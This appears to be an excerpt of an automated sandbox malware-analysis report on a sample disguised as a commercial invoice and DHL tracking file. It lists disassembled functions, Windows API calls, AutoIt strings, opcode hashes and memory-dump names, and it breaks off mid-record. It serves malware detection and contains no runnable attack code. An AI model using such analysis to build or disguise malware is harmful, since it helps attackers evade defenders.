API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 487b73b05f1350ab4c4d95a8c43ca2411d816fd047a73cc873f87987854c4af7
Instruction ID: 134b295098c5826ce24fb7212b98b649432c4bc79821407e7e252cf68dcc8e6a
Opcode Fuzzy Hash: 487b73b05f1350ab4c4d95a8c43ca2411d816fd047a73cc873f87987854c4af7
Instruction Fuzzy Hash: 3DD05EB29B0202BFFA3D8B3CD93FF363908E301780FC29749B301C9589D6C1A4068021

Function 0126781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0126798B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: ddb27ebae4c2aa180268ef1f9c38689e94650620210618680ea7792a8c573253
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: CF5178716317475BEB38857CA8557BE3BDD9B1224CF180919CB82C72C2C655EEC1E352

Function 01276DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0883159ca60575179a8c66c8b0875271eb48463decd2bce95c86d67f426e92d1
Instruction ID: 01f1843a2858aee22f642b2146536b90f136ebc97b36642a7e0298bdba498335
Opcode Fuzzy Hash: 0883159ca60575179a8c66c8b0875271eb48463decd2bce95c86d67f426e92d1
Instruction Fuzzy Hash: C7324621D39F414DD7239538E82A336768DAFB72C5F15D737E91AB999AEB39C0834200

Function 0125CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f46a19354e2f6bd54aa434f6ac0db1c32e0f13874480dc7e98b6ccd78ee47d0
Instruction ID: 10edc59da53c439424eba8e84f0b33a76e97a5936b10f837d634e914b898ee75
Opcode Fuzzy Hash: 7f46a19354e2f6bd54aa434f6ac0db1c32e0f13874480dc7e98b6ccd78ee47d0
Instruction Fuzzy Hash: EB323A31A342468FEF29CF2CC0E467D7FA5EB45311F18816ADB56CB292E234D9A1CB51

Function 01247920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f98be25805a874d3d49b526cb7cd276d9d5ff210af93bc5c6bb9737720455e07
Instruction ID: d5579519a5da261129af0c812cffb4c7d3e22b1920cf9a7b7b1fb27fb0a39064
Opcode Fuzzy Hash: f98be25805a874d3d49b526cb7cd276d9d5ff210af93bc5c6bb9737720455e07
Instruction Fuzzy Hash: E922E570A2020ADFDF18DFA8D981ABEB7F5FF58300F144529E916E7291EB35A914CB50

Function 012491C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 252e4a86e4e182c7edd71aff5034e9ea2d76a42c46cce2841c2c42fb65f57b7d
Instruction ID: 32fd4051402834bc78739edf10af69a09bedd1732ae7f443e0b9ddb0f74988b1
Opcode Fuzzy Hash: 252e4a86e4e182c7edd71aff5034e9ea2d76a42c46cce2841c2c42fb65f57b7d
Instruction Fuzzy Hash: 5302E5B1E21206EFDF05EF54D881AAEBBB5FF54304F118169E9169B2C0EB71A950CB90

Function 01261C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 93c04f2095cd7cbaa62d3d88fd106273060a8f9bc11b68bd332da1820b3ba089
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: BC9189725290E34EEB2E463E857503DFFE95AD21A130A079ED5F2CA1C5FE10E1B4D620

Function 012619B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: bec590888a52ab3a916c798575086a211b0b37233c609244ee55666108011998
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: BB9163722290E34EEB2E427E857503DFFE95AC22A230A079DD5F2CA1C5FD14E5B4D620

Function 01267A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93b0718f69948b7559cad1daabd68a8268c3b848b8747d757a0af15878b32729
Instruction ID: e867fe92d1c1b45cb744aede91ae0a4c2021052a6486e4c8246822b633caa4ff
Opcode Fuzzy Hash: 93b0718f69948b7559cad1daabd68a8268c3b848b8747d757a0af15878b32729
Instruction Fuzzy Hash: 3161893123034B96EE349A6CB8A5BBE779CDF5170CF10091AEB42DB2C0EA519EC2C355

Function 01261706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 18cc05fd384767c2f0fb83eb1016bbefd340d6cc875daedc343d2b8abd331e65
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 418166725290E34DEB6E463E857543EFFE55AC21A130A079DD5F2CA1C1EE24A1B4D620

Function 0125D065 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16f13a173ec3792081f0572d6917ea3af294cf3cc6d1f4e0513ce0b01be1c478
Instruction ID: fbb2ef5a4b6dcf71b5d765771d2f77ecd62a9eacbc4786e6f212402d90eadb56
Opcode Fuzzy Hash: 16f13a173ec3792081f0572d6917ea3af294cf3cc6d1f4e0513ce0b01be1c478
Instruction Fuzzy Hash: 08611772813756DFD74B4F75C44A040B3B0FFA672832849EED4808E1A9E77A18A6DF85

Function 001B35E0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348694160.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 41ba131b9c0f4c3341c50d778728b60c28a22b7382c8202fbeea699021e53863
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: E541A271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50

Function 012B2046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d4735ddc1127ca152c772349602df6042ad554b56353d35b076001d6ddb590
Instruction ID: 4e21a401a7acf658732ecc70e7ae44b1edf13ccae84710729f4f0a50884414f1
Opcode Fuzzy Hash: 12d4735ddc1127ca152c772349602df6042ad554b56353d35b076001d6ddb590
Instruction Fuzzy Hash: 0121BB326206158BD728CE79C4526BE73D9E764320F258A2EE4A7C37C5DE75A904C780

Function 001B34D0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348694160.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 5c2be94ea3d30b69d6970c45c68326e0d9adf1ea9d9c18ce98609b89d4ff9c94
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 17019D78A04209EFCB48DF98C5909AEF7F5FB48310F208699E819A7701E730AE51DB80

Function 001B3470 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348694160.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: c433d06d3d8fbf5f3472d0943d96b04dfd84901f9b3a1f0692b925d81de45999
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 14019D78A04209EFCB48DF98C5909AEF7F5FB48310F208699E919A7701E730AE51DB80

Function 001B1E70 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348694160.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 012C2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 012C2B30
DeleteObject.GDI32(00000000), ref: 012C2B43
DestroyWindow.USER32 ref: 012C2B52
GetDesktopWindow.USER32 ref: 012C2B6D
GetWindowRect.USER32(00000000), ref: 012C2B74
SetRect.USER32 ref: 012C2CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 012C2CB1
CreateWindowExW.USER32 ref: 012C2CF8
GetClientRect.USER32 ref: 012C2D04
CreateWindowExW.USER32 ref: 012C2D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 012C2D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 012C2D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 012C2D80
GlobalLock.KERNEL32 ref: 012C2D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012C2D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 012C2DA1
CloseHandle.KERNEL32(00000000), ref: 012C2DA8
GlobalFree.KERNEL32(00000000), ref: 012C2DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 012C2DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,012DFC38,00000000), ref: 012C2DDB
GlobalFree.KERNEL32(00000000), ref: 012C2DEB
CopyImage.USER32 ref: 012C2E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 012C2E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 012C2E52
ShowWindow.USER32(00000004), ref: 012C303F

Strings

AutoIt v3, xrefs: 012C2CF2
DISPLAY, xrefs: 012C2EA2
, xrefs: 012C2FC5
static, xrefs: 012C2D3A, 012C2E91

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 629f25c919ab2ae51b21c2b7ef2bb0e97cf3587899abcc7285f9ed99724e14c6
Instruction ID: 879b61d25e68344689979eaaf405793cdf193c93a31c12ddecc211e37af1c481
Opcode Fuzzy Hash: 629f25c919ab2ae51b21c2b7ef2bb0e97cf3587899abcc7285f9ed99724e14c6
Instruction Fuzzy Hash: D0027E71910215EFDB24DF64D888EAE7BB9FF48710F04861CFA15AB294DB70E901CB60

Function 012D70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 012D712F
GetSysColorBrush.USER32 ref: 012D7160
GetSysColor.USER32 ref: 012D716C
SetBkColor.GDI32(?,000000FF), ref: 012D7186
SelectObject.GDI32(?,?), ref: 012D7195
InflateRect.USER32 ref: 012D71C0
GetSysColor.USER32 ref: 012D71C8
CreateSolidBrush.GDI32(00000000), ref: 012D71CF
FrameRect.USER32 ref: 012D71DE
DeleteObject.GDI32(00000000), ref: 012D71E5
InflateRect.USER32 ref: 012D7230
FillRect.USER32 ref: 012D7262
GetWindowLongW.USER32(?,000000F0), ref: 012D7284

Part of subcall function 012D73E8: GetSysColor.USER32 ref: 012D7421
Part of subcall function 012D73E8: SetTextColor.GDI32(?,?), ref: 012D7425
Part of subcall function 012D73E8: GetSysColorBrush.USER32 ref: 012D743B
Part of subcall function 012D73E8: GetSysColor.USER32 ref: 012D7446
Part of subcall function 012D73E8: GetSysColor.USER32 ref: 012D7463
Part of subcall function 012D73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 012D7471
Part of subcall function 012D73E8: SelectObject.GDI32(?,00000000), ref: 012D7482
Part of subcall function 012D73E8: SetBkColor.GDI32(?,00000000), ref: 012D748B
Part of subcall function 012D73E8: SelectObject.GDI32(?,?), ref: 012D7498
Part of subcall function 012D73E8: InflateRect.USER32 ref: 012D74B7
Part of subcall function 012D73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 012D74CE
Part of subcall function 012D73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 012D74DB

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: a36db3dc3ab4f55b4a59054218f431937b8f6723ab2d9df95b8a6b789ca6d98d
Instruction ID: 5e9e9038d21bf8441ef13c0e225fed76ca21a03be390a230b8a18df6454ba77a
Opcode Fuzzy Hash: a36db3dc3ab4f55b4a59054218f431937b8f6723ab2d9df95b8a6b789ca6d98d
Instruction Fuzzy Hash: E5A1D232419302AFDB109F64EC4DE6BBBA9FB48324F004B1CFAA2A61D4D774D814CB51

Function 01258D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 01258E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 01296AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 01296AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01296F43

Part of subcall function 01258F62: InvalidateRect.USER32(?,00000000,00000001), ref: 01258FC5

SendMessageW.USER32(?,00001053), ref: 01296F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 01296F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 01296FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 01296FB7

Strings

0, xrefs: 01296DCF

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 75379fed0e0f40e4c8ca5e15ac208f6a5fcb5c2aa8d2408681b1550be42db79f
Instruction ID: 940524a99ec5e4feb04949c2304443303c5814607bbda2af73dd5c5b863cb289
Opcode Fuzzy Hash: 75379fed0e0f40e4c8ca5e15ac208f6a5fcb5c2aa8d2408681b1550be42db79f
Instruction Fuzzy Hash: 1312AD30621202DFDB25CF2CD888BBABBF5FB48300F544469FA999B651C771E891DB91

Function 012C2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 012C273E
SystemParametersInfoW.USER32 ref: 012C286A
SetRect.USER32 ref: 012C28A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 012C28B9
CreateWindowExW.USER32 ref: 012C2900
GetClientRect.USER32 ref: 012C290C
CreateWindowExW.USER32 ref: 012C2955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 012C2964
GetStockObject.GDI32(00000011), ref: 012C2974
SelectObject.GDI32(00000000,00000000), ref: 012C2978
GetTextFaceW.GDI32(00000000,00000040,?), ref: 012C2988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 012C2991
DeleteDC.GDI32(00000000), ref: 012C299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 012C29C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 012C29DD
CreateWindowExW.USER32 ref: 012C2A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 012C2A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 012C2A42
CreateWindowExW.USER32 ref: 012C2A77
GetStockObject.GDI32(00000011), ref: 012C2A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 012C2A8D
ShowWindow.USER32(00000004), ref: 012C2A97

Strings

AutoIt v3, xrefs: 012C28F8
msctls_progress32, xrefs: 012C2A13
DISPLAY, xrefs: 012C295A
static, xrefs: 012C294F, 012C2A71

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 793614968388035e742693e6ee4820ecaa89d491e218922b184e14207a6cf27c
